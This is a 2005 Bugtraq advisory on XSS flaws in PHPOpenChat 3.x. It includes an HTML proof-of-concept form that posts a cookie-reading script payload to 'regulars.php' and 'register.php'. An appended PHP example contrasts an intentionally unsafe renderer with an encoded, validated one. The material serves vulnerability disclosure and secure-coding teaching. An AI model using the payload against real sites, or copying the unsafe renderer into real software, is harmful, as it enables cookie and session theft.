Message-ID: <20050318072527.16506.qmail@www.securityfocus.com>
Date: 18 Mar 2005 07:25:27 -0000
From: PersianHacker Team <pi3ch@...oo.com>
To: bugtraq@...urityfocus.com
Subject: [PersianHacker.NET 200503-09]PHPOpenChat v3.x XSS Multiple
    Vulnerability




[PersianHacker.NET 200503-09]PHPOpenChat v3.X XSS Multiple Vulnerability
Date: 2005 March
Bug Number: 09

PHPOpenChat is a high-performance PHP-based chat server for a live chat room or chat module on any PHP-based site.
More info @:
http://phpopenchat.org/


Discussion:
--------------------
The software does not properly validate user-supplied input in 'regulars.php' and 'register.php'.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHPOpenChat software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.


Exploit:
--------------------
<html>
<head>
<title>PHPOpenChat v3.x XSS Exploit</title>
</head>
<body>
<h1>PHPOpenChat v3.x XSS Exploit</h1>
<form method="POST" action="http://www.example.com/regulars.php">
  <b>XSS in regulars.php:</b><p>
  <input type="text" name="chatter" size="48" value="XSS Injection Code"></p>
  <p>example: &lt;script&gt;document.write(document.cookie)&lt;/script&gt;</p>
  <p><input type="submit" style="width:80px" value="Execute" name="B1"></p>
</form>
<form method="POST" action="http://www.example.com/register.php">
  <b>XSS in register.php:</b><p>
  Nickname:
  <input type="text" name="chatter" size="48" value="XSS Injection Code"></p>
  <p>
  Password:
  <input type="text" name="chatter1" size="48" value="XSS Injection Code"></p>
  <p>
  FirstName LastName:
  <input type="text" name="chatter2" size="48" value="XSS Injection Code"></p>
  <p>
  Email:
  <input type="text" name="chatter3" size="48" value="XSS Injection Code"></p>
  <p>
  Url of picture:
  <input type="text" name="chatter4" size="48" value="XSS Injection Code"></p>
  <p>example: &lt;script&gt;document.write(document.cookie)&lt;/script&gt;</p>
  <p><input type="submit" style="width:80px" value="Execute" name="B1"></p>
</form>
<p>&nbsp;</p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
</body>
</html>


Solution:
--------------------
No solution was available at the time of this entry.


Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Pi3cH (pi3ch persianhacker net)
http://www.PersianHacker.NET

Special Thanks: devil_box (for XSS article), amectris, herbod.


Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: pi3ch persianhacker net


Note
--------------------
This vulnerability was reported to the authors, for a solution, through the bug report web form.
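
The class of flaw described above, shown as an added example that is not part of the original advisory and is not PHPOpenChat's code: a handler that echoes POST fields unchanged, beside a version that validates and HTML-encodes them on output. The field names 'chatter' and 'chatter4' are taken from the proof-of-concept form; the render functions, the h() helper and the sample request are assumptions made for illustration.

```php
<?php
// Added example, not PHPOpenChat code. Field names come from the advisory's
// proof-of-concept form; the rendering functions below are hypothetical.

// Vulnerable pattern: request data is concatenated into HTML unchanged.
function render_unsafe(array $post): string {
    return '<p>Welcome, ' . ($post['chatter'] ?? '') . '</p>';
}

// Encode for the HTML context at output time. ENT_QUOTES also covers values
// placed inside single- or double-quoted attributes.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: validate fields that have a known shape, encode every
// field when it is written into the page.
function render_safe(array $post): string {
    $nick = is_string($post['chatter'] ?? null) ? $post['chatter'] : '';
    $pic  = is_string($post['chatter4'] ?? null) ? $post['chatter4'] : '';
    // Accept only well-formed http(s) picture URLs; anything else is dropped.
    $scheme = strtolower((string) parse_url($pic, PHP_URL_SCHEME));
    $pic_ok = filter_var($pic, FILTER_VALIDATE_URL) !== false
        && in_array($scheme, ['http', 'https'], true);
    $html = '<p>Welcome, ' . h($nick) . '</p>';
    if ($pic_ok) {
        $html .= '<img src="' . h($pic) . '" alt="">';
    }
    return $html;
}

// Constructed sample request reusing the advisory's own test string.
$post = [
    'chatter'  => '<script>document.write(document.cookie)</script>',
    'chatter4' => '<script>document.write(document.cookie)</script>',
];

echo render_unsafe($post), "\n"; // vulnerable rendering
echo render_safe($post), "\n";   // hardened rendering
```

Because the advisory names cookie access as an impact, marking the session cookie HttpOnly (PHP's session.cookie_httponly setting) is a useful second layer. It does not remove the injection itself, so output encoding is still required.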

